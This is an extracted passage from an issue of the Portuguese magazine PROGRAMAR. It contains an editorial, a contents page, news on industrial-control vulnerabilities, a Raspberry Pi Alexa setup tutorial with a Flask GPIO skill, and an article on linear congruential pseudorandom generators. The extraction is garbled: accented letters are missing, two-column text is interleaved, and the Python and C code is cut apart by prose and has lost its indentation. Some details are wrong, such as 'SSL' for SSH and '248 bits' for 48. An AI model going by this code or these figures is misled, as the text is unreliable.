EDITORIAL

EQUIPA PROGRAMAR

The Geeks Will Inherit The Earth

Coordenador Apesar de possivelmente controverso o ttulo deste editorial, no para

Antnio Pedro Cunha Santos controvrsias o meu objectivo, na sua escrita.
A verdade que possivelmente muitos dos leitores, se identificam como
geeks! Como pessoas curiosas, dedicadas, vidas de conhecimento, dispostas a
Editor
Antnio Pedro Cunha Santos caminhar as outras milhas, mesmo na adversidade! Pessoas extraordinrias!
Com este Vero j em curso, quente, at por vezes demasiado quente, sonolento e
complexo, entre o calor, a praia, montes de festivais, livros e notcias que do
Capa vontade de no as ver, muitas vezes me lembro da msica, que serve de ttulo a
Filipa Peres esta edio! Os geeks herdaro a terra!
No passado ms de Junho, tive a oportunidade de ver como um conjunto de
Redaco geeks (developers, makers, arquitectos, engenheiros, gente das mais diversas
Alex Lattaro reas), comeou a organizar-se numa rede social, para usar os seus conhecimentos
Augusto Manzano e talentos, para fazer tentar fazer a diferena que ns geeks podemos fazer, para
Andr Melancia mudar o mundo fazendo-o um pouco melhor!
Antnio Pedro Cunha Santos
Nuno Cancelo Esta edio, gostava de a dedicar a todos os que fazem diferena, no
Nuno Silva ficando a ver o tempo passar, mas se inquietam todos os dias, para fazer a
Pedro Tavares diferena nas mais diversas reas , nos mais diversos sectores, nas mais diversas
Rita Peres situaes! Aqueles que independentemente de tudo, decidem estar inquietos e fazer
algo!
Staff
Antnio Pedro Cunha Santos A todos esses, dedico-vos a revista e deixo-vos o muito obrigado por serem
Rita Peres inquietos! Pois como tive oportunidade de ler, Muda uma vida, muda o Mundo,
Tiago Sousa obrigado por mudarem o Mundo!

Contacto
revistaprogramar@portugal-a- At prxima edio, boas leituras!
programar.org
Antnio Santos
Website
http://www.revista-programar.info

ISSN
1 647-071 0

A revista PROGRAMAR um projecto voluntrio sem fins lucrativos. Todos os artigos so da responsabilidade dos autores, no
podendo a revista ou a comunidade ser responsvel por alguma impreciso ou erro.
Para qualquer dvida ou esclarecimento poder sempre contactar-nos.

2
 NDICE
TEMA DE CAPA
6 Raspberry Pi Alexa - Antnio Santos

A PROGRAMAR

13 Pseudorandom Number Generators (PRNGs) - Pedro Tavares

16 Algoritmo BackPropagation - Rita Peres

ELECTRNICA
21 UP-CICLAR a velinha apareglhagem HI-FI - Antnio Santos

ANLISES DE ELECTRNICA
24 SONOFF RF- Antnio Santos

COLUNAS
27 De DataTable para ficheiro CSV (mais comum do que seria agradvel) - Antnio Santos
29 Kernel Panic - A Arte da Guerra e a tecnologia - Antnio Santos
35 SQL Curtas - Cursores: O Bom, o Mau e o SQL... Andr Melancia

ANLISES
40 Anlise do Livro: Desenvolvimento em Swift para iOS - Nuno Cancelo
41 Anlise do Livro: Bases de Dados e Geolocalizao - Rita Peres

SEGURANA
44 Como criar um programa auto-replicativo em assembly, para GNU/Linux - Antnio Santos

NO CODE
52 Windows 10: Ferramentas de Segurana - Nuno Silva

55 MODELOS DE AVALIAO DE INTERFACE - Augusto Manzano

60 Redes neurais artificiais: o que so? Onde vivem? Do que se alimentam? - Alex Lattaro
62 Mini Maker Faire Castelo Branco - Rita Peres

EVENTOS

Para mais informaes/eventos: http://bit.ly/PAP_Eventos. Divulga os teus eventos para o email eventos@portugal-a-
programar.pt

3
NOTCIAS
Robs e Parques Elicos vulnerveis
a ciberataques
Investigadores de Cibersegurana expuseram novas
vulnerabilidades passveis de explorao por ransomware.
Desde robs com que trabalhamos lado a lado at turbinas de
parques elicos esto sob risco de possveis ataques. Segun-
do a notcia avanada pelo Fiancial Times, na conferncia de
cibersegurana Black Hat, foram reveladas falhas recentes
que demonstram a possibilidade de usar a fraca segurana
dos sistemas de controlo industriais.
Estes investigadores expuseram estas falhas para que as
empresas as pudessem solucionar. Eles alertam para o facto
de software malicioso ou ransomware poder afetar grave-
mente as empresas.
Foram descobertas tambm graves falhas em parques eli-
cos , como por exemplo a falta de encriptao de mensagens,
a utilizao de passwords default e a no separao de redes,
de forma a que, uma vez que algum com ms intenes
entrasse no sistema, poderia controlar at todo um parque.
Recentemente pudemos testemunhar as notcias dos estra-
gos e transtornos causados pelo famoso Wannacry. Mas a
vulnerabilidade na segurana pode ter outras repercusses.
Ao invs de ser exigido o pagamento de um resgate, pode
acontecer que ao explorar essas vulnerabilidades, a prpria
produo de um produto seja afetada, danificando no so-
mente a produo e o aspeto financeiro da empresa em ques-
to mas tambm a sua reputao.
Jovens
O de Castelo Branco
constroem robs inteligentes
Teve lugar no Laboratrio de Robtica e Equipamentos
Inteligentes do Instituto Politcnico de Castelo Branco
(IPCB), a 13 edio consecutiva do estgio Construir
Robs Inteligentes. Este evento contou com o apoio da
Cincia Viva.
Este ano participaram doze alunos do 10 ao 12 ano de
Escolas Secundrias de Lisboa, Setbal, Pombal, Porto,
Sabugal, Fundo e Castelo Branco .
De acordo com a notcia avanada pelo Dirio Digital Cas-
telo Branco, este estgio pretendeu introduzir a robtica
aos alunos, abordando diversos conceitos desde a mecni-
ca, eletrnica e programao, necessrios construo e
desenvolvimento de robs. Os alunos puderam construir
robs inteligentes, capazes de se moverem autonomamen-
te e de serem comandados via remota atravs do telem-
vel.
Iniciaram a semana com a parte de componente mecnica
e eletrnica sob o acompanhamento do Professor Paulo
Gonalves e pelos investigadores Bernardo Loureno, Jo-
o Mendes, Megann Doudy, Paulo Amaral e Rodrigo Ber-
nardo. Seguidamente passaram construo da platafor-
ma robtica, respetivos testes e programao, tendo utili-
zado o Arduino. Isto constituiu uma nova experincia, bem
como a programao do smartphone Android para funcio-
nar como comando remoto do rob construdo.
Segundo apresentado no DDCB, os alunos avaliaram esta
iniciativa como sendo um sucesso: Convvio, construo
do rob e o trabalho em equipa na realizao das ativida-
des; Gostei de montar e de programar os robots e de
conhecer novos amigos!; A Programao em Arduino, e
os efeitos dos cdigos no movimento do rob; Alguma
dificuldade na ligao de fios; Apenas uma semana de
estgio pouco. Construir robs requer muito trabalho,
esprito de equipa, perseverana e mtodo.
Fontes: Dirio Digital Castelo Branco, Cincia Viva
Imagem: DDCB
4
TEMA DE CAPA
Raspberry Pi Alexa
TEMA DA CAPA
Raspberry Pi Alexa

A distribuio do Raspbian pode ser encontrada em:

Introduo https://www.raspberrypi.org/downloads/raspbian/ .

Existem diversos servios de assistente pessoal Uma vez descarregada a imagem, o processo de
inteligente, no entanto um dos populares em IoT a Alexa instalao diferente conforme o sistema operativo que
da Amazon, que vem por default do dispositivo Amazon esteja a ser utilizado no computador. Neste caso, ser
Echo Dot. utilizado o Windows 8.1, pelo que ser necessrio
descarregar a aplicao Win32DiskImager, que pode ser
A Alexa, denominada com base na antiga biblioteca encontrada em https://sourceforge.net/projects/
de Alexandria, a assistente pessoal inteligente win32diskimager/. Uma vez descarregada os passos so
desenvolvida pela Amazon, que permite que se comunique simples!
por voz com um dispositivo, se lhe dem comandos e o
dispositivo execute ou controle equipamentos, reproduza Executar a aplicao Win32DiskImager;
msica, efectue pesquisas, etc Este artigo surge aps o
desafio colocado pelo Bruno Horta, no grupo Movimento Inserir o carto SD/micro-sd na slot;
Maker Portugal e que eu tive o prazer de aceitar e concluir
Na aplicao escolher a letra da unidade onde o
dentro do prazo previsto!
carto est;
Por detrs deste servio existe um sistema de
processamento de linguagem natural, desenvolvido pela Escolher o ficheiro da imagem;
Amazon, que permite que a voz humana seja compreendida, Clicar Write e aguardar que complete;
premitindo a execuo das instrues dadas pelo utilizador.
Remover o carto com segurana.
Uma vez que em Portugal o dispositivo Amazon
Echo, ainda no se encontra disponvel e existe uma API
que permite utilizar o servio de assistente pessoal
inteligente da Amazon. Ao longo do artigo ser demonstrado
como instalar o software e comear a utilizar este servio
num Raspberry Pi. No caso concreto, uma vez que foi
utillizado um headset usb que no dispe de boto para
activar o microphone, a Alexa estar sempre em modo de
escuta.
No existem muitos dispositivos disponveis
compatveis com a Alexa, no entanto no complicado
tornar um dispositivo compatvel, recorrendo a uma API
Uma vez preparado o carto de memria, para ser
disponibilizada pela Amazon e s diversas bibliotecas
usado no raspberry pi, o passo seguinte ser ligar o
disponiveis online. Os comandos da Alexa, so chamados
raspberry pi, com o carto l colocado e seguir os seguintes
de Skils (capacidades), podendo ser desenvolvidos
passos para terminar as configuraes bsicas necessrias.
recorrendo API e so de forma muito resumida, aplicaes,
Neste caso concreto, foi utilizada a ligao ethernet, para
que implementam determinada funcionalidade. J existem
ligar o raspberry rede. Para configurar o raspbian seguem-
diversas disponveis, prontas a utilizar e equipamentos
se os seguintes passos:
compatveis com a Alexa. Para teste, foram usados alguns
da itead.cc . Efectua-se o login no sistema, com o user e password
Uma das limitaes da Alexa, prende-se com o facto por defeito (login: pi , password: raspberry);
de apenas conseguir receber e executar um comando de
Uma vez na bash, digita-se sudo raspi-config para
cada vez, isto claro alm de terem de ser todos em ingls.
abrir a aplicao que permite efectuar as
Seria interessante em futuras verses ver o servio a
configuraes necessrias.
executar mais do que um comando, algo tipo Alexa, turn on
living room and enterance hall lights.
Instalao
O primeiro passo instalar a distribuio Raspbian,
ou outra baseada em Debian, no raspberry pi. Para tal, basta
gravar a imagem num carto de memria SD / micro-sd, que
ir ser utilizado no raspberry pi.

6

Tal como pode ser visto na figura anterior ser
apresentada a aplicao com as opes numeradas, que
permitem efectuar uma srie de configuraes base
necessrias. Apenas nos focaremos nas configuraes base
necessrias, uma vez que as restantes saem do mbito
deste artigo.
No menu, escolhemos a primeira opo Expand
FileSystem e confirmamos a aco. Ser
apresentada uma mensagem a indicar que esta
aco apenas ter efeito aps o reincio do sistema,
no entanto podemos prosseguir.
Pelas bvias razes de segurana, o passo seguinte
ser alterar a password do utilizador pi. Para tal
seleccionamos a segunda opo Change user
password e alteramos a password.
Uma vez que estaremos a utilizar um teclado
portugus o passo seguinte ser recorrer opo 4
Internacionalization Options e ser alterado o
keyboard layout, para portugus.
Por fim, vamos s opes avanadas (Advanced
Options), para activar a opo de ligao por SSL,
uma vez que no ser muito prtico ter de andar
sempre a ligar e desligar teclados, para o que
possamos precisar. Dentro das opes avanadas,
seleccionamos ssh e de seguida enable.
TEMA DA CAPA
RASPBERRY PI ALEXA
Feitos estes procedimentos, hora de reiniciar o raspberry,
recorrendo ao comando seguinte:
$ sudo shutdown r now
Uma vez reiniciado o sistema, podemos finalmente
avanar para a instalao do AlexaPi, que nos permitir usar o
servio Alexa da Amazon.
Mas antes disso, falta-nos apenas um pormenor.
necessrio registar o dispositivo na amazon, para que
possamos usar o Alexa Voice Service. Caso j tenhamos uma
conta developer na amazon, podemos avanar alguns passos,
caso contrrio o passo seguinte ser mesmo o de registar-se
na amazon em https://goo.gl/FHmvHf . O processo de registo
simples e intuitivo, pelo que no ser detalhado neste artigo.
Seguindo para o registo do dispositivo, uma vez feito o
login em https://developer.amazon.com, selecionamos a opo
ALEXA no menu, e de seguida Alexa Voice Service. De
seguida, escolhemos a opo Register a Product Type e
posteriormentemente Device. Neste momento ser visvel a
Device Type Info, na tab esquerda.
Tal como visivel na imagem exemplo, tm de ser
preenchidos os campos Device Type ID e Display Name.
Convm usar algum nome que seja simples de associar ao
que realmente , mas isso no de todo difcil. Agora passa-
se ao item seguinte, o Security Profile. Neste item, clica-se
em Create a new profile, de seguida escolhe-se um Security
Profile Name e Security Profile Description e clica-se no
boto next para dar continuidade.
7
TEMA DA CAPA
RASPBERRY PI ALEXA
Na tab web settings clicamos em edit, para alterar
o conteudo e em Allowed Origins escrevemos http://
localhost:5050 e http://10.0.0.100:5050, onde o endereo
ip, deve ser substitudo pelo ip local do nosso raspberry pi.
De igual forma em Allowed return URLs preenchemos com
http://localhost:5050/code e http://10.0.0.100, trocando
novamente o endereo ip pelo do raspberry pi. So
necessrios preencher mais alguns dados, mas nada de
complicado, conforme se pode observar nas figuras
seguintes.
Terminada a parte de configuraes na Amazon, hora
de inslatar o AlexaPi, no raspberry! Para tal, acedemos por
ssh, utilizando um software cliente de ssh a gosto, no meu
caso o putty, e uma vez feito o login, comeamos!
A primeira coisa a fazer, ser mesmo instalar o git no
raspbian. Para tal recorremos ao seguinte comando na bash:
$ sudo apt-get install git
Com o git instalado, podemos partir para a fase seguinte.
Primeiramente deslocamos o cursor para a pasta /opt
com o seguinte comando:
$ cd /opt
Agora vamos clonar o repositrio git do projecto AlexaPi,
para podermos prosseguir com a instalao.
$ sudo git clone https://github.com/alexa-pi/
AlexaPi.git
E executamos o script de instalao do Alexa pi:
$ sudo ./AlexaPi/src/scripts/setup.sh
Terminada a instalao e antes de se avanar para o
arranque do AlexaPi, uma vez que no caso deste artigo foi
usado um headset usb, tal como j foi referido, temos de
efectuar algumas configuraes adicionais, caso contrrio o
rasbpian ir utilizar os dispositivos audio padro do raspberry
pi. Para tal comeamos por desabilitar o PA.
$ sudo mkdir -p /var/lib/AlexaPi/.config/pulse
$ sudo cp /etc/pulse/client.conf /var/lib/
AlexaPi/.config/pulse/
De seguida, temos de editar o ficheiro client.conf que se
encontra em /var/lib/AlexaPi/.config/pulse/, e definir o valor
autospawn para no. Para tal recorremos a um editor de
texto. Neste caso ser usado o nano, mas pode ser usado o
que o leitor preferir.
$ sudo nano /var/lib/AlexaPi/.config/pulse/
client.conf
Dentro do ficheiro colocamos o seguinte:
autospawn = no
Feito isto, proseguimos para as configuraes com o
objectivo de executar o PA (Pulse Audio) em modo de todo
os sistema (System-wide mode), uma vez que esta a forma
mais segura de utilizar o PA com o AlexaPi. Para tal
comeamos por executar os seguintes comandos:
$ sudo apt install pulseaudio pavucontrol
$ sudo apt remove pavumeter paman padevchooser
$ sudo mkdir -p /var/lib/AlexaPi/.config/pulse
$ sudo cp /etc/pulse/client.conf /var/lib/
AlexaPi/.config/pulse/
Voltamos a editar o ficheiro client.conf que se encontra em /
var/lib/AlexaPi/.config/pulse/ e a definir o autospawn=no.
Agora temos de dar permisses de escrita ao ficheiro de log
do alexa pi, com o seguinte comando:
$ sudo chown -R alexapi:alexapi /var/lib/AlexaPi/
$ sudo usermod --home /var/lib/AlexaPi alexapi
De seguida adicionamos o utilizador que vamos usar
no raspberry, ou por defeito o utilizador pi e o utilizador
alexapi ao grupo de utilizadores pulse-access e o utilizador
8
 TEMA DA CAPA
RASPBERRY PI ALEXA
pulse ao grupo de utilizadores audio, recorrendo aos que ela responder com a informao meteorolgica actual e
seguintes comandos: previso para o dia seguinte, para Lisboa.

$ sudo adduser pulse audio No entanto o nosso objectivo ser mais do que utilizar
$ sudo adduser pi pulse-access aquilo que j est implementado, portanto, para o fazermos
$ sudo adduser alexapi pulse-access vamos usar um outro raspberry ligado mesma rede, mas
$ sudo adduser root pulse-access
que ser programado, para acender e apagar um led.
Agora temos de criar um servio systemd para
Como j foi explicado como instalar o Raspbian num
permitir que o PulseAudio se inicie com o boot, em modo de
Raspberry Pi, no vou repetir essa parte, sendo que o
system (system wide mode). Para tal usando um editor de
utilizador deve seguir os passos do primeiro exemplo, com a
texto cria-se o ficheiro em /etc/systemd/pulseaudio.service .
excepo de instalar o AlexaPi.
$ sudo touch /etc/systemd/system/ O led que ser aceso e apagado, liga-se o catodo
pulseaudio.service
(perna mais curta) do led ao pin 3 (GND) do Raspberry Pi,
em srie com uma resistncia de 330ohm, e o anodo do led,
E de seguida editar o ficheiro com um editor de texto.
ao pin 21 (GPIO), do Raspberry Pi, conforme o diagrama
$ sudo nano/etc/systemd/system/pulseaudio.service abaixo.

E colocar-lhe o seguinte contedo:

[Unit]
Description=PulseAudio Daemon

[Install]
WantedBy=multi-user.target

[Service]
Type=simple
PrivateTmp=true
ExecStart=/usr/bin/pulseaudio --system --realtime
--disallow-exit --no-cpu-limit

Agora ser necessrio activar o servio para que ele

arranque de forma automtica:
$ sudo systemctl enable pulseaudio.service
Feito isto, chegou a hora de instalar, configurar e
E por fim configuramos o conofig.yaml, para o AlexaPi usar
escrever o cdigo que suportar esta action! Para tal
PulseAudio.
comeamos por instalar o Python2.7 e o flask recorrendo aos
sudo nano /etc/opt/AlexaPi/config.yaml seguintes comandos.

E na seco de som, do ficheiro colocar as seguintes linhas:
input_device: "pulse"
output: "pulse"
output_device: ""
Terminado tudo isto, ser necessrio reiniciar o raspberry de
novo, para que tudo seja assumido. Uma vez reiniciado
faltam apenas dois comandos para se poder comear a
utilizar a Alexa! Os comandos so:
$ sudo systemctl start AlexaPi.service
$ sudo systemctl status AlexaPi.service
$ sudo apt-get update && sudo apt-get upgrade -y
$ sudo apt-get install python2.7-dev python-dev
python-pip
$ sudo pip install Flask flask-ask
Agora instalamos o ngrok para arm, que se encontra
disponvel em https://ngrok.com/download recorrendo ao
wget.
$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok
-stable-linux-arm.zip
$ unzip /home/pi/ngrok-stable-linux-arm.zip
Uma vez instalado hora de o executar.

Neste momento bastar dizer Alexa ao micro para poder- $ sudo ./ngrok http 5000
mos ouvir Yes?, indicando que o servio est a funcionar e
Com estas tarefas prontas, vamos ao cdigo que nos
aguarda comandos nossos.
permitir implementar a skill que ir interagir com a Alexa.
Alguns exemplos do que possivel fazer, tendo em
Para tal iremos criar um ficherio chamado gpio_alexa.py que
conta que nem todos os servios esto disponveis em
ser executado posteriormente e mantido em execuo.
Portugal, ser perguntar como est o tempo numa qualquer
Para isto vamos precisar de usar terminais separados, pelo
cidade! Por exemplo Alexa hows the weather in Lisbon ao
que convm ter este pormenor em ateno.

9
TEMA DA CAPA
RASPBERRY PI ALEXA
O cdigo do programa ser o seguinte:

from flask import Flask

from flask_ask import Ask, statement,
convert_errors
import RPi.GPIO as GPIO
import logging

GPIO.setmode(GPIO.BCM)

app = Flask(__name__)
ask = Ask(app, '/')

logging.getLogger("flask_ask").setLevel
(logging.DEBUG)

@ask.intent('GPIOControlIntent', mapping=
{'status': 'status'})
def gpio_status(status):

if status in ['on','high' ]:
GPIO.setup(21, GPIO.IN)
state = GPIO.input(21)
if (state == True):
GPIO.setup(21, GPIO.OUT) necessrio preencher a grande maioria dos
GPIO.output(21,GPIO.HIGH)
return statement('Lights are already on') campos, mas como so intuitivos, vamos apenas focar os
else: mais importantes. Em Skill Name, escrevemos RPI
GPIO.setup(21, GPIO.OUT) Control e em Invocation name escrevemos raspberry pi.
GPIO.output(21,GPIO.HIGH) Em Interaction Model colocamos o cdigo referente ao
return statement('Turning lights {}'.format
(status)) esquema pretendido intent schema.

if status in ['off','low' ]: {
GPIO.setup(21, GPIO.IN) "intents": [
state = GPIO.input(21) {
print('status of light',state) "slots": [
if (state == False): {
GPIO.setup(21, GPIO.OUT) "name": "status",
GPIO.output(21,GPIO.LOW) "type": "GPIO_CONTROL"
return statement('Lights are already off') }
else: ],
GPIO.setup(21, GPIO.OUT) "intent": "GPIOControlIntent"
GPIO.output(21,GPIO.LOW) }
return statement('Turning lights {}'.format ]
(status)) }

if __name__ == '__main__': Em Add Slot Type dentro de Enter Type escrevemos

port = 5000 #a porta pode ser definida pelo GPIO_Control e em Enter Values escrevemos on e off
#programador e em uterrance, os seguintes valores:
app.run(host='0.0.0.0', port=port)
GPIOControlIntent to turn lights {status}
Escrito o cdigo e colocado a correr, temos de criar GPIOControlIntent to turn {status} the lights
uma capacidade (skill) para a Alexa. Para isto voltamos
consola da Amazon, selecionamos Alexa e depois Alexa
Skill Set, e por fim Add a new skill.

10
 TEMA DA CAPA
RASPBERRY PI ALEXA
Agora em configurao seleccionamos HTTPS como Agora sim, podemos dizer ao micro do raspberry que
Endpoint do servio e escolhemmos a regio, no nosso caso tem o AlexaPi instalado Alexa, tell Raspberry Pi to turn light
Europe. on e veremos o led acender!

Por fim, na caixa destinada ao url, digitamos o url que Concluso

foi gerado quando executamos pela primeira vez o ficheiro
gpio_control.py. O endereo seve ser algo semelhante a:
https://dd3F58A9.ngrok.io .
E para terminar esta parte, em SSL Certificate, escolhemos
My development endpoint is a sub-domain of a domain that
has a wildcard certificate from a certificate authority.
E agora testamos no simulador, e vmos o resultado no
raspberry.
Apesar do equipamento Amazon Echo no estar
ainda disponvel em Portugal, a utilizao do servio da
amazon no de todo impossvel, ainda que apenas fale e
entenda a lingua inglesa. Existem bastantes dispositivos
compatveis com Alexa, como por exemplo os WeMo, que
podem ser simulados usando um ESP8266, alm de
diversos dispositivos compatveis, disponibilizados por
diversos fabricantes, como o caso da Itead.
Poder ser engraado para o leitor aventurar-se a
ligar outros equipamentos utilizando o GPIO do raspberry Pi,
ou at quem sabe em lugar de utilizarem o raspberry para
instalar a Alexa, utilizar por exemplo um C.H.I.P. de
menores dimenses e maior eficincia energtica.
Ao longo deste artigo instalamos e configuramos o
AlexaPi e de seguida usamos um outro raspberry pi, para
criar um pequeno circuito e adicionar uma skill Alexa que
lhe permitiu acender e apagar um led. Muito mais pode ser
feito, mas isso fica ao critrio da imaginao do leitor!

Com tudo isto terminado, gravamos e podemos fechar o

Amazon developer.

AUTOR
Escrito por Antnio C. Santos

Programar criar um novo mundo escrevendo cdigo, cumprindo os mais elementares desgnios da
vida, aprender, ensinar, criar, partilhar, melhorar e seguir. Formou-se no Instituto Politcnico de Viana
do Castelo. Membro da Comunidade Portugal-a-Programar desde Agosto de 2007, tambm membro da
Sahana Software Foundation, onde Programador Voluntrio desde 2012, actualmente exerce funes
de mentor voluntrio na plataforma MOOC Coursera . Twitter:@apocsantos

11
A PROGRAMAR
Pseudorandom Number Generators (PRNGs)

Pseudorandom Number Generators (PRNGs)
java.util.Random gera um nmero aleatrio?
Pseudo-random Number Generators, ou simplesmen-
te PRNGs, so algoritmos para gerao de nmeros com
propriedades semelhantes dos nmeros aleatrios
(random numbers). Os PRNGs produzem sequncias de
nmeros aparentemente independentes, normalmente se-
guindo uma distribuio uniforme, com base numa expres-
so matemtica. So normalmente definidos pelos seguintes
aspetos: o seu output determinstico, peridico e depende
de um valor de inicializao, conhecido como seed. Este tipo
de algoritmos (os PRNGs) so normalmente mais rpidos
que a gerao de nmeros realmente aleatrios no /dev/
random ou /dev/urandom (por exemplo, disponveis numa
distribuio Linux), uma vez que o SO usa o input de dados
de interfaces de hardware, p.ex., o rato, trfego de rede da
NIC (Network Interface Controller), et cetera.
Um outro exemplo de um true random number gene-
rator o random.org, onde so usados dados de rudo at-
mosfrico como input de aleatoriedade.
PRNGs
PRNGs representam peas cruciais dentro do contex-
to da simulao computacional, pois permitem criar situa-
es aleatrias pelas quais um evento do mundo real afe-
tado. Assim, uma falha em termos da qualidade de Random-
ness pode resultar numa reproduo deficiente do modelo
de simulao, levando possivelmente a concluses falsas ou
deficientes.
Processamento sinnimo de tempo, e os PRNGs
produzem resultados num espao temporal consideravel-
mente menor em relao a outro tipo de geradores de nme-
ros e sequncias aleatrias. Um exemplo desse facto a
gerao de trfego de rede, onde a distribuio dos resulta-
dos deve ser controlada e seguindo uma distribuio expo-
nencial, e no deve ser morosa (i.e., o tempo de processa-
mento no pode ser muito elevado).
PRNGs so tambm usados em mquinas de jogos
online, jogos de vdeo e aplicaes de segurana informti-
ca. No campo de segurana da informao, os PRNGs so
muitas vezes a fonte de chaves de criptografia, nonces,
hashs ou cifras. Nem todos os PRNGs podem ser usados
em todas essas aplicaes, uma vez que nem todos cum-
prem com exatido algumas das regras que lhes permite
serem a fonte para determinadas implementaes criptogr-
ficas. Para criptografia so usados um tipo especfico de
PRNGs conhecidos por CSPRNGs (geradores de nmero
pseudo-aleatrio criptograficamente seguros), com proprie-
dades que os tornam adequados para esse contexto.
A PROGRAMAR
Hoje em dia, existem muitos algoritmos para gerao
de nmeros pseudo-aleatrios com distribuio uniforme,
como p.ex., LCG, ISAAC, Mersenne Twister, etc., todos defi-
nidos por caractersticas prprias:
Perodo (comprimento do output);
Independncia (todos os nmeros da sequncia de-
vem ser independentes uns dos outros);
Distribuio uniforme (a probabilidade de sair o nme-
ro 2 igual probabilidade de sair o nmero 7);
Rapidez (na gerao);
Reprodutibilidade (capacidade de reproduzir a se-
quncia novamente com determinados parmetros
iniciais).
De notar que as propriedades acima citadas so difi-
cilmente conciliveis, pelo que a seleo de um gerador con-
veniente para uma dada situao pode ser uma tarefa no
muito trivial.
PRNGs so ento funes matemticas que debitam
uma sequncia finita de nmeros, isto , a dada altura a se-
quncia de nmeros comea a repetir-se. Ao tamanho dessa
sequncia chamado perodo.
java.util.Random tem um perodo e repete-se passadas algu-
mas iteraes ...
LINEAR CONGRUENTIAL GENERATOR (LCG)
O LCG o PRNG mais popular dentro deste contexto
e usado largamente para gerao de nmeros pseudo-
aleatrios com uma distribuio uniforme. Ele de fcil im-
plementao, tem alta performance computacional e simples
de entender. bastante usado a nvel cientfico. O LCG
um PRNG que gera sequncias de inteiros pseudo-aleatrias
com base na expresso matemtica
Xn = aXn-1 + b mod M
em que a, b e M so nmeros inteiros com determinadas
caractersticas. Como se pode concluir da definio, cada
nmero da sequncia Xn produzido a partir do seu ante-
cessor Xn-r . Alguns destes geradores usam um nmero pri-
mo como M e b igual a 0. O nmero mximo que o perodo
que estes geradores podem atingir M e, para que isso
acontea, a e b devem preencher requisitos adicionais. Por
exemplo, de uma maneira geral, a-1 deve ser divisvel por
todos os primos que fatorizam M, e b deve ser coprimo com
13
A PROGRAMAR
PSEUDORANDOM NUMBER GENERATORS (PRNGS)
M. Se M for uma potncia de 2 (muito comum em implementa- comum encontrarem-se geradores com o tamanho
es prticas, j que operaes mdulo 232 ou 264 so simples do perodo igual a ou mltiplo do tamanho mximo de um
de implementar em mquinas de 32 ou 64 bits), ento a-1 deve registo inteiro no CPU, (e.g., 232 , que numericamente re-
ser divisvel por 4. presentado pelo valor 4294967296 -- 32 bits de 1s). A ttulo
de exemplo, possvel obter um LCG com um perodo de 2
A escolha dos valores que parametrizam o gerador
com a seguinte parametrizao:
crtica para manter uma qualidade mnima dos nmeros gera-
dos. Por exemplo, pode verificar-se a partir da seguinte iniciali-
zao que o gerador acima descrito (LCG) degenera num gera-
rseed=(rseed 1103515245+12345)&RAND MAX
dor fraco.
O java.util.Random um LCG que gera nmeros ale-
a=4 b=2 M=8
atrios de 248 bits atravs do UNIX rand48, usando apenas
Considere comear com X1 = 1. A sequncia gerada a os primeiros 32 bits como output til.
seguinte:
#include "unif01.h"
#include "bbattery.h"
= 4 1 + 2 mod 8 = 6;
#include <stdio.h>
#include <time.h>
= 4 6 + 2 mod 8 = 2; #include <stdlib.h>
#include <math.h>
#include "ulcg.h"
= 4 2 + 2 mod 8 = 2;
#define norm 2.328306549295728e-10
unsigned int rseed = 5;

double lcg(){
= 2; return (rseed=(rseed * 1103515245 + 12345) &
RAND_MAX)*norm;
A sequncia dada por: (1, 6, 2, 2, 2, ). Comeou a }
repetir o valor 2 logo a partir do terceiro valor. Para os parme-
int main (void) {
tros iniciais definidos anteriormente (incluindo o X1), o perodo unif01_Gen *gen;
desta sequncia 3. gen = unif01_CreateExternGen01 ("MyLCG",
lcg); /* My LCG */
Na verdade, difcil garantir excelente comportamento
para sequncias produzidas com um LCG, mas pelo menos bbattery_SmallCrush (gen);
possvel garantir que o perodo mximo (i.e., M) atingido. unif01_DeleteExternGen01 (gen);
Para garantir que o LCG tem um perodo M, podem ser defini- return 0;
das algumas regras cabea, nomeadamente: b e M tm de }
ser co-primos, e a-1 tem de ser divisvel por todos os factores
primos de M. O java.util.Random um LCG que gera nmeros ale-
atrios de bits atravs do UNIX rand48, usando apenas os
Ter um perodo completo significa que a sequncia co- primeiros 32 bits como output til.
mea a repetir-se apenas aps M, e antes que isso acontea, a
sequncia constituda por todos os valores possveis mdulo Teste Estatstico ao LCG
M. Para que isso acontea importante determinar a melhor
parametrizao. Existem baterias de teste preparadas para testar
exaustivamente PRNGs, nomeadamente a TestU01. O cdi-
Se forem considerados agora os seguintes parmetros go acima entregue j possui a implementao do LCG usado
de inicializao: no java nesta biblioteca de teste de PRNGs. O resultado da
qualidade do LCG a seguinte para a bateria de testes mais
a=4 b=3 M=16,as regras impostas acima so satisfeitas, i.e.: modesta, conhecida por SmallCrush:
M potncia de 2 (16= 24), a-1=4 e divisvel por 4, e 3 e 16 so ========= Summary results of SmallCrush
nmeros co-primos. =========
Neste caso, aplicando as regras definidas, consegue-se
que o mximo perodo para os parmetros de inicializao com Version TestU01 1.2.3
mdulo M=16 seja atingido. A sequncia produzida, comean- Generator: MyLCG
do por X1 = 10, seria: Number of statistics: 15
Total CPU time: 00:00:03.56
(10, 5, 12, 15, 14, 9, 0, 3, 2, 13, 4, 7, 6, 1, 8, 11, 10, ) The following tests gave p-values out-
Mas se um PRNG no infinito, qual o perodo mxi-
side [0.001, 0.9990]:
(eps means a value < 1.0e - 300):
mo do LCG? Isto , quantos nmeros diferentes so possveis
(eps1 means a value < 1.0e - 15):
gerar para uma sequncia com este algoritmo?

14
 A PROGRAMAR

PSEUDORANDOM NUMBER GENERATORS (PRNGS)

De 15 testes efetuados, 12 falharam. Atingem-se resultados
Test p-value semelhantes para para outras baterias de testes, o que con-
----------------------------------------- firma a pouca qualidade para a gerao de nmeros aleat-
rios atravs deste PRNG.
1 BirthdaySpacings eps
2 Collision 5.8e-14 Previsvel? Java.util.random?
3 Gap eps
4 SimpPoker eps Sim, o java.util.Random usa o LCG para a gerao de
6 MaxOft eps nmeros pseudo aleatrios, da a previsibilidade nos valores
6 MaxOft AD 1 - eps1 gerados. Este gerador nunca pode ser usado em aplicaes
criptogrficas, seja de que forma for. No entanto, uma fun-
9 HammingIndep 1.1e-11
o rpida, excelente para pequenas experincias e gerao
10 RandomWalk1 H eps de valores em aplicaes de lazer (e.g., jogos).
10 RandomWalk1 M eps
10 RandomWalk1 J eps
10 RandomWalk1 R eps
10 RandomWalk1 C eps
-----------------------------------------
All other tests were passed

AUTOR
Escrito por Pedro Tavares

Pedro Tavares atualmente um profissional no ramo da segurana da informao. Desempenha funes como IT Security
Engineer, membro fundador e pentester no CSIRT.UBI e fundador do blog seguranca-informatica.pt.

15
A PROGRAMAR
Algoritmo BackPropagation
